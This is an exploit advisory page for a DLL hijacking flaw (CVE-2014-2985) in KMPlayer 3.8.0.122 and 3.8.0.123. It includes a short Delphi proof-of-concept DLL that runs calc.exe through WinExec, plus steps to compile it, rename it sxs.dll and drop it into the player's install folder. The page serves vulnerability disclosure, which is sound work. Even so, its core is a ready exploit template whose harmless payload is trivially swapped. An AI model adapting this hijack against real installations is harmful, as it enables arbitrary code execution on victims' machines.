Kmplayer 3.8.0.122 / 3.8.0.123 DLL Hijacking

2014.04.29
Risk: Low
Local: Yes
Remote: No
CWE: N/A

# Kmplayer 3.8.0.122 / 3.8.0.123 DLL Hijacking # ########################### # # Exploit Title: [KmPlayer 3.8.0.123 DLL Hijacking ] # Date: [2014/04/22] # Exploit Author: [Aryan Bayaninejad] # Linkedin : https://www.linkedin.com/profile/view?id=276969082 # Vendor Homepage: [http://www.kmplayer.com/] # Software Link: [ http://www.softpedia.com/progDownload/KMPlayer-Download-26726.html] # Version: [Version 3.8.0.122 and 3.8.0.123 ] # Tested on: [Windows Xp Sp3 - 32bit & Windows 7 - 32bit & 64bit] # CVE : [CVE-2014-2985] # ########################### details: Untrusted search path vulnerability in Kmplayer latest version [3.8.0.123] when running on Windows 7, and XP, allows local users and possibly remote attackers to gain privileges via a Trojan horse DLL in the current working directory by sxs.dll . uses Windows; begin Winexec(PAnsichar('C:\WINDOWS\system32\calc.exe'),sw_show); end. Compile Above Source Code With Delphi And Rename Compiled DLL To sxs.dll Then Copy It To The KMPlayer Installed Path, Now If You Run The KMPlayer DLL Will Hijacked!


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top